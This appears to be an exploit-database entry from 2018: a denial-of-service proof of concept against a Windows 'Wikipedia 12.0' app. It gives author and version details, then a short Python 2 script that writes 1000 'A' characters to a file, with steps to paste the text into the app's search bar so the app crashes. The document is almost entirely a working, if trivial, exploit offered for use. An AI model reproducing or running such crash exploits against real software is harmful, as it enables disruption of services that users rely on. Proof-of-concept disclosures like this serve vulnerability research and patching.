# Exploit Title: Wikipedia 12.0 - Denial of Service (PoC) # Date: 9/2/2018 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://www.microsoft.com/en-us/p/wikipedia/9wzdncrfhwm4?activetab=pivot%3aoverviewtab # Version: 12.0 # Tested on: Windows 10 # Proof of Concept: # Run the python script, it will create a new file "wiki.txt" # Copy the text from the generated wiki.txt file to clipboard # Paste the text in the search bar in the top right of app # App will now crash buffer = "A" * 1000 payload = buffer try: f=open("wiki.txt","w") print "[+] Creating %s evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"